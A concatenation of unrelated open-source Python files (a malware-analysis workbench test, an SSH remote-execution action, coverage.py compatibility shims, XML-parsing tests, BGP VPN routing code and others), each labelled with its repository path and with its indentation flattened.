workbench = zerorpc.Client(timeout=300, heartbeat=60)
workbench.connect('tcp://'+args['server']+':'+args['port'])
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)),'../data/pe/bad')
file_list = [os.path.join(data_path, child) for child in os.listdir(data_path)][:2]
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)),'../data/pe/good')
file_list += [os.path.join(data_path, child) for child in os.listdir(data_path)][:2]
for filename in file_list:
if '.DS_Store' in filename: continue
with open(filename,'rb') as f:
base_name = os.path.basename(filename)
md5 = workbench.store_sample(f.read(), base_name, 'exe')
results = workbench.work_request('pe_peid', md5)
pprint.pprint(results)
def test():
"""Executes pe_peid test."""
run()
if __name__ == '__main__':
run()
|
data/MirantisWorkloadMobility/CloudFerry/cloudferry/lib/os/actions/remote_execution.py
|
from cloudferry.lib.base.action import action
from cloudferry.lib.utils.ssh_util import SshUtil
class RemoteExecution(action.Action):
def __init__(self, cloud, host=None, int_host=None, config_migrate=None):
self.cloud = cloud
self.host = host
self.int_host = int_host
self.config_migrate = config_migrate
self.remote_exec_obj = SshUtil(self.cloud,
self.config_migrate,
self.host)
super(RemoteExecution, self).__init__({})
def run(self, command, **kwargs):
self.remote_exec_obj.execute(command, self.int_host)
return {}
|
data/RoseOu/flasky/venv/lib/python2.7/site-packages/coverage/backward.py
|
"""Add things to old Pythons so I can pretend they are newer."""
import os, re, sys
try:
set = set
except NameError:
from sets import Set as set
try:
sorted = sorted
except NameError:
def sorted(iterable):
"""A 2.3-compatible implementation of `sorted`."""
lst = list(iterable)
lst.sort()
return lst
try:
reversed = reversed
except NameError:
def reversed(iterable):
"""A 2.3-compatible implementation of `reversed`."""
lst = list(iterable)
return lst[::-1]
try:
"".rpartition
except AttributeError:
def rpartition(s, sep):
"""Implement s.rpartition(sep) for old Pythons."""
i = s.rfind(sep)
if i == -1:
return ('', '', s)
else:
return (s[:i], sep, s[i+len(sep):])
else:
def rpartition(s, sep):
"""A common interface for new Pythons."""
return s.rpartition(sep)
try:
from cStringIO import StringIO
BytesIO = StringIO
except ImportError:
from io import StringIO, BytesIO
try:
string_class = basestring
except NameError:
string_class = str
try:
import cPickle as pickle
except ImportError:
import pickle
try:
range = xrange
except NameError:
range = range
try:
{}.iteritems
except AttributeError:
def iitems(d):
"""Produce the items from dict `d`."""
return d.items()
else:
def iitems(d):
"""Produce the items from dict `d`."""
return d.iteritems()
if sys.version_info >= (3, 0):
def exec_code_object(code, global_map):
"""A wrapper around exec()."""
exec(code, global_map)
else:
eval(
compile(
"def exec_code_object(code, global_map):\n"
" exec code in global_map\n",
"<exec_function>", "exec"
)
)
if sys.version_info >= (3, 0):
import tokenize
try:
open_source = tokenize.open
except AttributeError:
from io import TextIOWrapper
detect_encoding = tokenize.detect_encoding
def open_source(fname):
"""Open a file in read only mode using the encoding detected by
detect_encoding().
"""
buffer = open(fname, 'rb')
encoding, _ = detect_encoding(buffer.readline)
buffer.seek(0)
text = TextIOWrapper(buffer, encoding, line_buffering=True)
text.mode = 'r'
return text
else:
def open_source(fname):
"""Open a source file the best way."""
return open(fname, "rU")
if sys.version_info >= (3, 0):
def to_bytes(s):
"""Convert string `s` to bytes."""
return s.encode('utf8')
def to_string(b):
"""Convert bytes `b` to a string."""
return b.decode('utf8')
def binary_bytes(byte_values):
"""Produce a byte string with the ints from `byte_values`."""
return bytes(byte_values)
def byte_to_int(byte_value):
"""Turn an element of a bytes object into an int."""
return byte_value
def bytes_to_ints(bytes_value):
"""Turn a bytes object into a sequence of ints."""
return bytes_value
else:
def to_bytes(s):
"""Convert string `s` to bytes (no-op in 2.x)."""
return s
def to_string(b):
"""Convert bytes `b` to a string (no-op in 2.x)."""
return b
def binary_bytes(byte_values):
"""Produce a byte string with the ints from `byte_values`."""
return "".join([chr(b) for b in byte_values])
def byte_to_int(byte_value):
"""Turn an element of a bytes object into an int."""
return ord(byte_value)
def bytes_to_ints(bytes_value):
"""Turn a bytes object into a sequence of ints."""
for byte in bytes_value:
yield ord(byte)
try:
import hashlib
md5 = hashlib.md5
except ImportError:
import md5
md5 = md5.new
|
data/Wtower/django-ninecms/ninecms/migrations/0004_auto_20150624_1131.py
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ninecms', '0003_auto_20150623_1731'),
]
operations = [
migrations.AlterModelOptions(
name='node',
options={'permissions': (('access_toolbar', 'Can access the CMS toolbar'), ('use_full_html', 'Can use Full HTML in node body and summary'), ('list_nodes', 'Can list nodes'))},
),
]
|
data/Unidata/siphon/siphon/tests/test_ncss_dataset.py
|
import logging
import xml.etree.ElementTree as ET
from siphon.ncss_dataset import NCSSDataset, _Types
from siphon.testing import get_recorder
from siphon.http_util import urlopen
log = logging.getLogger("siphon.ncss_dataset")
log.setLevel(logging.WARNING)
log.addHandler(logging.StreamHandler())
recorder = get_recorder(__file__)
class TestSimpleTypes(object):
'Test parsing simple types from NCSS dataset.xml'
@classmethod
def setup_class(cls):
cls.types = _Types()
def test_attribute_1(self):
'Test parsing a string attribute'
xml = '<attribute name="long_name" ' \
'value="Specified height level above ground"/>'
element = ET.fromstring(xml)
expected = {"long_name": "Specified height level above ground"}
actual = self.types.handle_attribute(element)
assert expected == actual
def test_attribute_2(self):
'Test parsing a float nan attribute'
import math
xml = '<attribute name="missing_value" type="float" value="NaN"/>'
element = ET.fromstring(xml)
expected = {"missing_value": [float("NaN")]}
actual = self.types.handle_attribute(element)
assert expected.keys() == actual.keys()
assert(math.isnan(actual["missing_value"][0]))
assert(math.isnan(expected["missing_value"][0]))
def test_attribute_3(self):
'Test parsing a float value attribute'
xml = '<attribute name="missing_value" type="float" value="-999"/>'
element = ET.fromstring(xml)
expected = {"missing_value": [float(-999)]}
actual = self.types.handle_attribute(element)
assert expected == actual
def test_attribute_4(self):
'Test parsing an int attribute'
xml = '<attribute name="missing_value" type="int" value="-999"/>'
element = ET.fromstring(xml)
expected = {"missing_value": [-999]}
actual = self.types.handle_attribute(element)
assert expected == actual
def test_value_1(self):
'Test parsing a float value tag'
xml = '<values>2.0</values>'
element = ET.fromstring(xml)
expected = {"values": ["2.0"]}
actual = self.types.handle_values(element)
assert expected == actual
def test_value_2(self):
'Test parsing multiple floats in a value tag'
xml = '<values>50000.0 70000.0 85000.0</values>'
element = ET.fromstring(xml)
expected = {"values": ["50000.0", "70000.0", "85000.0"]}
actual = self.types.handle_values(element)
assert expected == actual
def test_value_3(self):
'Test parsing multiple floats in a value tag to actual float values'
xml = '<values>50000.0 70000.0 85000.0</values>'
element = ET.fromstring(xml)
expected = {"values": [50000.0, 70000.0, 85000.0]}
actual = self.types.handle_values(element, value_type="float")
assert expected == actual
def test_value_4(self):
'Test parsing multiple ints in a value tag to actual int values'
xml = '<values>50000 70000 85000</values>'
element = ET.fromstring(xml)
expected = {"values": [50000, 70000, 85000]}
actual = self.types.handle_values(element, value_type="int")
assert expected == actual
def test_projection_box(self):
'Test parsing a projection box'
xml = '<projectionBox>' \
'<minx>-2959.1533203125</minx>' \
'<maxx>2932.8466796875</maxx>' \
'<miny>-1827.929443359375</miny>' \
'<maxy>1808.070556640625</maxy>' \
'</projectionBox>'
element = ET.fromstring(xml)
expected = {"projectionBox": {"minx": -2959.1533203125,
"maxx": 2932.8466796875,
"miny": -1827.929443359375,
"maxy": 1808.070556640625}}
actual = self.types.handle_projectionBox(element)
assert expected == actual
def test_axis_ref(self):
'Test parsing an axis reference'
xml = '<axisRef name="time1"/>'
element = ET.fromstring(xml)
expected = "time1"
actual = self.types.handle_axisRef(element)
assert expected == actual
def test_coord_trans_ref(self):
'Test parsing a coordinate transformation reference'
xml = '<coordTransRef name="LambertConformal_Projection"/>'
element = ET.fromstring(xml)
expected = {"coordTransRef": "LambertConformal_Projection"}
actual = self.types.handle_coordTransRef(element)
assert expected == actual
def test_grid(self):
'Test parsing a grid tag'
xml = '<grid name="Temperature_isobaric" ' \
'desc="Temperature @ Isobaric surface" ' \
'shape="time1 isobaric3 y x" type="float">' \
'<attribute name="units" value="K"/>' \
'<attribute name="missing_value" type="float" value="-999.9"/>' \
'<attribute name="Grib2_Parameter" type="int" value="0 0 0"/>' \
'</grid>'
element = ET.fromstring(xml)
expected = {"name": "Temperature_isobaric",
"desc": "Temperature @ Isobaric surface",
"shape": "time1 isobaric3 y x",
"attributes": {"units": "K",
"missing_value": [-999.9],
"Grib2_Parameter": [0, 0, 0]}}
actual = self.types.handle_grid(element)
assert expected["attributes"] == actual["attributes"]
assert expected.pop("attributes", None) == actual.pop("attributes", None)
def test_parameter(self):
'Test parsing a parameter tag'
xml = '<parameter name="earth_radius" value="6371229.0 "/>'
element = ET.fromstring(xml)
expected = {"earth_radius": "6371229.0"}
actual = self.types.handle_parameter(element)
assert expected == actual
def test_feature_type(self):
'Test parsing a feature dataset tag'
xml = '<featureDataset type="station" ' \
'url="/thredds/ncss/nws/metar/ncdecoded/' \
'Metar_Station_Data_fc.cdmr"/>'
element = ET.fromstring(xml)
expected = {"type": "station",
"url": "/thredds/ncss/nws/metar/ncdecoded/"
"Metar_Station_Data_fc.cdmr"}
actual = self.types.handle_featureDataset(element)
assert expected == actual
def test_variable(self):
'Test parsing variable tags'
xml = '<variable name="precipitation_amount_hourly" type="float">' \
'<attribute name="long_name" ' \
'value="Hourly precipitation amount"/>' \
'<attribute name="standard_name" ' \
'value="precipitation_amount"/>' \
'<attribute name="_FillValue" type="float" value="-99999.0"/>' \
'<attribute name="units" value=".01 inches"/>' \
'</variable>'
element = ET.fromstring(xml)
expected = {"name": "precipitation_amount_hourly",
"type": "float",
"attributes": {"long_name": "Hourly precipitation amount",
"standard_name": "precipitation_amount",
"_FillValue": [-99999.0],
"units": ".01 inches"}}
actual = self.types.handle_variable(element)
assert expected == actual
def test_dataset_elements_axis():
'Test parsing an axis from a dataset element'
xml = '<axis name="height_above_ground" shape="1" type="float" ' \
'axisType="Height"><attribute name="units" value="m"/>' \
'<attribute name="long_name" ' \
'value="Specified height level above ground"/>' \
'<attribute name="positive" value="up"/><attribute ' \
'name="Grib_level_type" type="int" value="103"/>' \
'<attribute name="datum" value="ground"/>' \
'<attribute name="_CoordinateAxisType" value="Height"/>' \
'<attribute name="_CoordinateZisPositive" value="up"/>' \
'<values>2.0</values></axis>'
element = ET.fromstring(xml)
actual = NCSSDataset(element).axes
assert actual
assert len(actual) == 1
assert actual["height_above_ground"]
assert len(actual["height_above_ground"]) == 4
assert actual["height_above_ground"]["attributes"]
assert len(actual["height_above_ground"]["attributes"]) == 8
def test_dataset_elements_grid_set():
'Test parsing a gridSet from a dataset element'
xml = '<gridSet name="time1 isobaric3 y x"><projectionBox>' \
'<minx>-2959.1533203125</minx>' \
'<maxx>2932.8466796875</maxx>' \
'<miny>-1827.929443359375</miny>' \
'<maxy>1808.070556640625</maxy>' \
'</projectionBox>' \
'<axisRef name="time1"/>' \
'<axisRef name="isobaric3"/>' \
'<axisRef name="y"/>' \
'<axisRef name="x"/>' \
'<coordTransRef name="LambertConformal_Projection"/>' \
'<grid name="Relative_humidity_isobaric" ' \
'desc="Relative humidity @ Isobaric surface" ' \
'shape="time1 isobaric3 y x" type="float">' \
'<attribute name="long_name" ' \
'value="Relative humidity @ Isobaric surface"/>' \
'<attribute name="units" value="%"/>' \
'<attribute name="abbreviation" value="RH"/>' \
'<attribute name="missing_value" type="float" value="NaN"/>' \
'<attribute name="grid_mapping" ' \
'value="LambertConformal_Projection"/>' \
'<attribute name="coordinates" ' \
'value="reftime time1 isobaric3 y x "/>' \
'<attribute name="Grib_Variable_Id" value="VAR_0-1-1_L100"/>' \
'<attribute name="Grib2_Parameter" type="int" value="0 1 1"/>' \
'<attribute name="Grib2_Parameter_Discipline" ' \
'value="Meteorological products"/>' \
'<attribute name="Grib2_Parameter_Category" value="Moisture"/>' \
'<attribute name="Grib2_Parameter_Name" ' \
'value="Relative humidity"/>' \
'<attribute name="Grib2_Level_Type" value="Isobaric surface"/>' \
'<attribute name="Grib2_Generating_Process_Type" ' \
'value="Forecast"/>' \
'</grid>' \
'<grid name="Temperature_isobaric" ' \
'desc="Temperature @ Isobaric surface" ' \
'shape="time1 isobaric3 y x" type="float">' \
'<attribute name="long_name" ' \
'value="Temperature @ Isobaric surface"/>' \
'<attribute name="units" value="K"/>' \
'<attribute name="abbreviation" value="TMP"/>' \
'<attribute name="missing_value" type="float" value="NaN"/>' \
'<attribute name="grid_mapping" ' \
'value="LambertConformal_Projection"/>' \
'<attribute name="coordinates" ' \
'value="reftime time1 isobaric3 y x "/>' \
'<attribute name="Grib_Variable_Id" value="VAR_0-0-0_L100"/>' \
'<attribute name="Grib2_Parameter" type="int" value="0 0 0"/>' \
'<attribute name="Grib2_Parameter_Discipline" ' \
'value="Meteorological products"/>' \
'<attribute name="Grib2_Parameter_Category" ' \
'value="Temperature"/>' \
'<attribute name="Grib2_Parameter_Name" value="Temperature"/>' \
'<attribute name="Grib2_Level_Type" value="Isobaric surface"/>' \
'<attribute name="Grib2_Generating_Process_Type" ' \
'value="Forecast"/>' \
'</grid>' \
'</gridSet>'
element = ET.fromstring(xml)
actual = NCSSDataset(element).gridsets
assert actual
assert len(actual) == 1
assert actual["time1 isobaric3 y x"]
gs = actual["time1 isobaric3 y x"]
assert gs["axisRef"]
assert len(gs["axisRef"]) == 4
assert gs["coordTransRef"]
assert gs["projectionBox"]
assert len(gs["projectionBox"]) == 4
assert gs["grid"]
assert len(gs["grid"]) == 2
for grid in gs["grid"]:
assert len(gs["grid"][grid]) == 4
assert gs["grid"][grid]["desc"]
assert gs["grid"][grid]["shape"]
assert gs["grid"][grid]["type"]
assert gs["grid"][grid]["type"] == "float"
assert len(gs["grid"][grid]["attributes"]) == 13
def test_dataset_elements_coord_transform_valid():
'Test parsing a coordinate transformation from a dataset element'
xml = '<coordTransform name="LambertConformal_Projection" ' \
'transformType="Projection">' \
'<parameter name="grid_mapping_name" ' \
'value="lambert_conformal_conic"/>' \
'<parameter name="latitude_of_projection_origin" ' \
'value="40.0 "/>' \
'<parameter name="longitude_of_central_meridian" ' \
'value="262.0 "/>' \
'<parameter name="standard_parallel" value="40.0 "/>' \
'<parameter name="earth_radius" value="6371229.0 "/>' \
'</coordTransform>'
element = ET.fromstring(xml)
actual = NCSSDataset(element).coordinate_transforms
assert actual
assert actual["LambertConformal_Projection"]
assert len(actual["LambertConformal_Projection"]) == 2
assert actual["LambertConformal_Projection"]["transformType"] == "Projection"
parameters = actual["LambertConformal_Projection"]["parameters"]
assert len(parameters) == 5
expected = {"grid_mapping_name": "lambert_conformal_conic",
"latitude_of_projection_origin": "40.0",
"longitude_of_central_meridian": "262.0",
"standard_parallel": "40.0",
"earth_radius": "6371229.0"}
assert parameters == expected
def test_dataset_elements_lat_lon_box():
'Test parsing a lat/lon box from a dataset element'
xml = '<LatLonBox>' \
'<west>-140.1465</west>' \
'<east>-56.1753</east>' \
'<south>19.8791</south>' \
'<north>49.9041</north>' \
'</LatLonBox>'
element = ET.fromstring(xml)
expected = {"west": -140.1465,
"east": -56.1753,
"south": 19.8791,
"north": 49.9041}
actual = NCSSDataset(element).lat_lon_box
assert actual
assert expected == actual
def test_dataset_elements_time_span():
'Test parsing a TimeSpan'
xml = '<TimeSpan><begin>2015-06-19T12:00:00Z</begin>' \
'<end>2015-06-23T18:00:00Z</end></TimeSpan>'
element = ET.fromstring(xml)
expected = {"begin": "2015-06-19T12:00:00Z",
"end": "2015-06-23T18:00:00Z"}
actual = NCSSDataset(element).time_span
assert actual
assert expected == actual
def test_dataset_elements_accept_list():
'Test parsing an AcceptList'
xml = '<AcceptList><GridAsPoint>' \
'<accept displayName="xml">xml</accept>' \
'<accept displayName="xml (file)">xml_file</accept>' \
'<accept displayName="csv">csv</accept>' \
'<accept displayName="csv (file)">csv_file</accept>' \
'<accept displayName="netcdf">netcdf</accept>' \
'<accept displayName="netcdf4">netcdf4</accept>' \
'</GridAsPoint>' \
'<Grid>' \
'<accept displayName="netcdf">netcdf</accept>' \
'<accept displayName="netcdf4">netcdf4</accept>' \
'</Grid>' \
'</AcceptList>'
element = ET.fromstring(xml)
expected = {"GridAsPoint": ["xml", "xml_file",
"csv", "csv_file",
"netcdf", "netcdf4"],
"Grid": ["netcdf", "netcdf4"]}
actual = NCSSDataset(element).accept_list
assert expected == actual
def test_dataset_elements_station_accept_list():
'Test parsing acceptList for stations'
xml = '<AcceptList>' \
'<accept displayName="csv">csv</accept>' \
'<accept displayName="csv (file)">text/csv</accept>' \
'<accept displayName="xml">xml</accept>' \
'<accept displayName="xml (file)">text/xml</accept>' \
'<accept displayName="WaterML 2.0">waterml2</accept>' \
'<accept displayName="CF/NetCDF-3">netcdf</accept>' \
'<accept displayName="CF/NetCDF-4">netcdf4</accept>' \
'</AcceptList>'
element = ET.fromstring(xml)
expected = {"PointFeatureCollection": ["csv", "text/csv",
"xml", "text/xml",
"waterml2", "netcdf", "netcdf4"]}
actual = NCSSDataset(element).accept_list
assert expected == actual
@recorder.use_cassette('Surface_Synoptic_Station_Dataset_xml')
def test_dataset_elements_full_ncss_station():
'Test parsing the dataset from a full ncss station page'
url = ('http://thredds.ucar.edu/thredds/ncss/nws/synoptic/'
'ncdecoded/Surface_Synoptic_Point_Data_fc.cdmr/dataset.xml')
element = ET.fromstring(urlopen(url).read())
parsed = NCSSDataset(element)
assert parsed
@recorder.use_cassette('GFS_Global_0p5_Grid_Dataset_xml')
def test_dataset_elements_full_ncss_grid():
'Test parsing the dataset from a full ncss grid page'
url = ('http://thredds.ucar.edu/thredds/ncss/grib/NCEP/GFS/'
'Global_0p5deg/GFS_Global_0p5deg_20150602_0000.grib2/'
'dataset.xml')
element = ET.fromstring(urlopen(url).read())
parsed = NCSSDataset(element)
assert parsed
|
data/OpenKMIP/PyKMIP/kmip/core/keys.py
|
from kmip.core.enums import Tags
from kmip.core.primitives import Struct
from kmip.core.primitives import ByteString
from kmip.core.utils import BytearrayStream
class RawKey(ByteString):
def __init__(self, value=None):
super(RawKey, self).__init__(value, Tags.KEY_MATERIAL)
class OpaqueKey(ByteString):
def __init__(self, value=None):
super(OpaqueKey, self).__init__(value, Tags.KEY_MATERIAL)
class PKCS1Key(ByteString):
def __init__(self, value=None):
super(PKCS1Key, self).__init__(value, Tags.KEY_MATERIAL)
class PKCS8Key(ByteString):
def __init__(self, value=None):
super(PKCS8Key, self).__init__(value, Tags.KEY_MATERIAL)
class X509Key(ByteString):
def __init__(self, value=None):
super(X509Key, self).__init__(value, Tags.KEY_MATERIAL)
class ECPrivateKey(ByteString):
def __init__(self, value=None):
super(ECPrivateKey, self).__init__(value, Tags.KEY_MATERIAL)
class TransparentSymmetricKey(Struct):
class Key(ByteString):
def __init__(self, value=None):
super(TransparentSymmetricKey.Key, self).__init__(value, Tags.KEY)
def __init__(self, key=None):
super(TransparentSymmetricKey, self).__init__(Tags.KEY_MATERIAL)
self.key = key
self.validate()
def read(self, istream):
super(TransparentSymmetricKey, self).read(istream)
tstream = BytearrayStream(istream.read(self.length))
self.key = TransparentSymmetricKey.Key()
self.key.read(tstream)
self.is_oversized(tstream)
self.validate()
def write(self, ostream):
tstream = BytearrayStream()
self.key.write(tstream)
self.length = tstream.length()
super(TransparentSymmetricKey, self).write(ostream)
ostream.write(tstream.buffer)
def validate(self):
self.__validate()
def __validate(self):
pass
|
data/OpenMDAO/OpenMDAO-Framework/openmdao.main/src/openmdao/main/test/test_set_defaults.py
|
"""
Test for setting input variables back to their default values.
"""
import unittest
from openmdao.main.api import Component, Assembly
from openmdao.main.datatypes.api import Float, List, Array
from numpy import array, zeros
class MyDefComp(Component):
f_in = Float(3.14, iotype='in')
f_out = Float(iotype='out')
arr_in = Array([1.,2.,3.], iotype='in')
list_in = List(value=['a','b','c'], iotype='in')
def execute(self):
self.f_out = self.f_in + 1.
class MyNoDefComp(Component):
f_in = Float(iotype='in')
f_out = Float(iotype='out')
arr_in = Array(iotype='in')
list_in = List(iotype='in')
def execute(self):
self.f_out = self.f_in + 1.
class SetDefaultsTestCase(unittest.TestCase):
def test_set_to_unset_default(self):
comp = MyNoDefComp()
self.assertEqual(0., comp.f_in)
comp.f_in = 42.
comp.arr_in = array([88., 32.])
comp.list_in = [1,2,3]
comp.run()
comp.revert_to_defaults()
self.assertEqual(0., comp.f_in)
self.assertTrue(all(zeros(0,'d')==comp.arr_in))
self.assertEqual([], comp.list_in)
def test_set_to_default(self):
comp = MyDefComp()
self.assertEqual(3.14, comp.f_in)
comp.f_in = 42.
comp.arr_in = array([88., 32.])
self.assertFalse(array([1.,2.,3.])==comp.arr_in)
comp.run()
comp.revert_to_defaults()
self.assertEqual(3.14, comp.f_in)
self.assertTrue(all(array([1.,2.,3.])==comp.arr_in))
def test_set_recursive(self):
asm = Assembly()
asm.add('defcomp', MyDefComp())
asm.add('nodefcomp', MyNoDefComp())
self.assertEqual(0., asm.nodefcomp.f_in)
self.assertEqual(3.14, asm.defcomp.f_in)
asm.nodefcomp.f_in = 99
asm.defcomp.f_in = 99
asm.revert_to_defaults()
self.assertEqual(0., asm.nodefcomp.f_in)
self.assertEqual(3.14, asm.defcomp.f_in)
if __name__ == '__main__':
unittest.main()
|
data/Yelp/pyleus/examples/apparent_temperature/apparent_temperature/humidity_generator.py
|
from __future__ import absolute_import
import logging
from collections import namedtuple
import random
from apparent_temperature.measure_generator import MeasureGeneratorSpout
log = logging.getLogger('humidity_generator')
HumidityMeasure = namedtuple(
"HumidityMeasure",
"id_sensor timestamp humidity")
class HumiditySpout(MeasureGeneratorSpout):
OUTPUT_FIELDS = HumidityMeasure
SENSORS = {
1042: (56, 17),
1077: (47, 22),
1078: (22, 19),
1079: (12, 15),
1082: (67, 15),
1126: (70, 12),
1156: (51, 19),
1178: (43, 14),
1201: (57, 11),
1234: (55, 7),
1312: (12, 9),
1448: (56, 22),
2089: (32, 30),
}
def measure(self, *args):
return min(100, random.normalvariate(*args))
def log(self, measure):
log.debug("id: {0}, time: {1}, humidity: {2}%"
.format(*measure))
if __name__ == '__main__':
logging.basicConfig(
level=logging.DEBUG,
filename='/tmp/apparent_temperature_humidity.log',
filemode='a',
)
HumiditySpout().run()
|
data/MacSysadmin/pymacadmin/lib/PyMacAdmin/SCUtilities/SCPreferences.py
|
"""
SCPreferences.py: Simplified interaction with SystemConfiguration preferences
TODO:
* Refactor getvalue/setvalue code into generic functions for dealing with things other than proxies
* Add get_proxy() to parallel set_proxy()
"""
import sys
import os
import unittest
from SystemConfiguration import *
class SCPreferences(object):
"""Utility class for working with the SystemConfiguration framework"""
proxy_protocols = ('HTTP', 'FTP', 'SOCKS')
session = None
def __init__(self):
super(SCPreferences, self).__init__()
self.session = SCPreferencesCreate(None, "set-proxy", None)
def save(self):
if not self.session:
return
if not SCPreferencesCommitChanges(self.session):
raise RuntimeError("Unable to save SystemConfiguration changes")
if not SCPreferencesApplyChanges(self.session):
raise RuntimeError("Unable to apply SystemConfiguration changes")
def set_proxy(self, enable=True, protocol="HTTP", server="localhost", port=3128):
new_settings = SCPreferencesPathGetValue(self.session, u'/NetworkServices/')
for interface in new_settings:
new_settings[interface]['Proxies']["%sEnable" % protocol] = 1 if enable else 0
if enable:
new_settings[interface]['Proxies']['%sPort' % protocol] = int(port)
new_settings[interface]['Proxies']['%sProxy' % protocol] = server
SCPreferencesPathSetValue(self.session, u'/NetworkServices/', new_settings)
class SCPreferencesTests(unittest.TestCase):
def setUp(self):
raise RuntimeError("Thwack Chris about not writing these yet")
if __name__ == '__main__':
unittest.main()
|
data/Orange-OpenSource/bagpipe-bgp/bagpipe/bgp/vpn/ipvpn/__init__.py
|
import logging
import socket
from bagpipe.bgp.common import utils
from bagpipe.bgp.common import logDecorator
from bagpipe.bgp.vpn.vpn_instance import VPNInstance
from bagpipe.bgp.engine import RouteEvent
from bagpipe.bgp.vpn.dataplane_drivers import DummyDataplaneDriver \
as _DummyDataplaneDriver
from bagpipe.bgp.common.looking_glass import LookingGlass, LGMap
from bagpipe.exabgp.structure.vpn import RouteDistinguisher, VPNLabelledPrefix
from bagpipe.exabgp.structure.mpls import LabelStackEntry
from bagpipe.exabgp.structure.address import AFI, SAFI
from bagpipe.exabgp.structure.ip import Inet, Prefix
from bagpipe.exabgp.message.update.route import Route
from bagpipe.exabgp.message.update.attribute.nexthop import NextHop
from bagpipe.exabgp.message.update.attribute.communities import ECommunities
class DummyDataplaneDriver(_DummyDataplaneDriver):
pass
class VRF(VPNInstance, LookingGlass):
type = "ipvpn"
afi = AFI(AFI.ipv4)
safi = SAFI(SAFI.mpls_vpn)
@logDecorator.log
def __init__(self, *args, **kwargs):
VPNInstance.__init__(self, *args, **kwargs)
self.readvertised = set()
def _routeFrom(self, prefix, label, rd):
return Route(VPNLabelledPrefix(self.afi, self.safi, prefix, rd,
[LabelStackEntry(label, True)]
))
def generateVifBGPRoute(self, macAdress, ipPrefix, prefixLen, label):
route = self._routeFrom(Prefix(self.afi, ipPrefix, prefixLen), label,
RouteDistinguisher(
RouteDistinguisher.TYPE_IP_LOC, None,
self.bgpManager.getLocalAddress(),
self.instanceId)
)
self.log.debug("route attributes: %s", route.attributes)
return self._newRouteEntry(self.afi, self.safi, self.exportRTs,
route.nlri, route.attributes)
def _getLocalLabels(self):
for portData in self.macAddress2LocalPortData.itervalues():
yield portData['label']
def _getRDFromLabel(self, label):
return RouteDistinguisher(RouteDistinguisher.TYPE_IP_LOC, None,
self.bgpManager.getLocalAddress(),
10000+label)
def _routeForReAdvertisement(self, prefix, label):
route = self._routeFrom(prefix, label,
self._getRDFromLabel(label))
nh = Inet(1, socket.inet_pton(socket.AF_INET,
self.dataplane.driver.getLocalAddress()))
route.attributes.add(NextHop(nh))
route.attributes.add(ECommunities(self.readvertiseToRTs))
routeEntry = self._newRouteEntry(self.afi, self.safi,
self.readvertiseToRTs,
route.nlri, route.attributes)
return routeEntry
@logDecorator.log
def _readvertise(self, nlri):
self.log.debug("Start re-advertising %s from VRF", nlri.prefix)
for label in self._getLocalLabels():
self.log.debug("Start re-advertising %s from VRF, with label %s",
nlri.prefix, label)
routeEntry = self._routeForReAdvertisement(nlri.prefix, label)
self._pushEvent(RouteEvent(RouteEvent.ADVERTISE, routeEntry))
self.readvertised.add(nlri.prefix)
@logDecorator.log
def _readvertiseStop(self, nlri):
self.log.debug("Stop re-advertising %s from VRF", nlri.prefix)
for label in self._getLocalLabels():
self.log.debug("Stop re-advertising %s from VRF, with label %s",
nlri.prefix, label)
routeEntry = self._routeForReAdvertisement(nlri.prefix, label)
self._pushEvent(RouteEvent(RouteEvent.WITHDRAW, routeEntry))
self.readvertised.remove(nlri.prefix)
def vifPlugged(self, macAddress, ipAddressPrefix, localPort,
advertiseSubnet):
VPNInstance.vifPlugged(self, macAddress, ipAddressPrefix, localPort,
advertiseSubnet)
label = self.macAddress2LocalPortData[macAddress]['label']
for prefix in self.readvertised:
self.log.debug("Re-advertising %s with this port as next hop",
prefix)
routeEntry = self._routeForReAdvertisement(prefix, label)
self._pushEvent(RouteEvent(RouteEvent.ADVERTISE, routeEntry))
def vifUnplugged(self, macAddress, ipAddressPrefix, advertiseSubnet):
label = self.macAddress2LocalPortData[macAddress]['label']
for prefix in self.readvertised:
self.log.debug("Stop re-advertising %s with this port as next hop",
prefix)
routeEntry = self._routeForReAdvertisement(prefix, label)
self._pushEvent(RouteEvent(RouteEvent.WITHDRAW, routeEntry))
VPNInstance.vifUnplugged(self, macAddress, ipAddressPrefix,
advertiseSubnet)
def _route2trackedEntry(self, route):
if isinstance(route.nlri, VPNLabelledPrefix):
return route.nlri.prefix
else:
self.log.error("We should not receive routes of type %s",
type(route.nlri))
return None
def _toReadvertise(self, route):
return (len(set(route.routeTargets).intersection(
set(self.readvertiseFromRTs))) > 0)
def _imported(self, route):
return (len(set(route.routeTargets).intersection(
set(self.importRTs))) > 0)
@utils.synchronized
@logDecorator.log
def _newBestRoute(self, entry, newRoute):
prefix = entry
if self.readvertise:
self.log.debug("route RTs: %s", newRoute.routeTargets)
self.log.debug("readv from RTs: %s", self.readvertiseFromRTs)
if self._toReadvertise(newRoute):
self.log.debug("Need to re-advertise %s", prefix)
self._readvertise(newRoute.nlri)
if not self._imported(newRoute):
self.log.debug("No need to setup dataplane for:%s", prefix)
return
encaps = self._checkEncaps(newRoute)
if not encaps:
return
self.dataplane.setupDataplaneForRemoteEndpoint(
prefix, newRoute.attributes.get(NextHop.ID).next_hop,
newRoute.nlri.labelStack[0].labelValue, newRoute.nlri, encaps)
@utils.synchronized
@logDecorator.log
def _bestRouteRemoved(self, entry, oldRoute, last):
prefix = entry
if self.readvertise and last:
if self._toReadvertise(oldRoute):
self.log.debug("Need to stop re-advertising %s", prefix)
self._readvertiseStop(oldRoute.nlri)
if not self._imported(oldRoute):
self.log.debug("No need to setup dataplane for:%s", prefix)
return
if self._skipRouteRemoval(last):
self.log.debug("Skipping removal of non-last route because "
"dataplane does not want it")
return
self.dataplane.removeDataplaneForRemoteEndpoint(
prefix, oldRoute.attributes.get(NextHop.ID).next_hop,
oldRoute.nlri.labelStack[0].labelValue, oldRoute.nlri)
def getLGMap(self):
return {
"readvertised": (LGMap.VALUE, [repr(prefix) for prefix in
self.readvertised])
}
|
data/adblockplus/gyp/test/compiler-override/gyptest-compiler-env-toolchain.py
|
"""
Verifies that the user can override the compiler and linker using
CC/CXX/NM/READELF environment variables.
"""
import TestGyp
import os
import copy
import sys
here = os.path.dirname(os.path.abspath(__file__))
if sys.platform == 'win32':
sys.exit(0)
for key in ['CC', 'CXX', 'LINK', 'CC_host', 'CXX_host', 'LINK_host',
'NM_target', 'READELF_target']:
if key in os.environ:
del os.environ[key]
def CheckCompiler(test, gypfile, check_for, run_gyp):
if run_gyp:
test.run_gyp(gypfile)
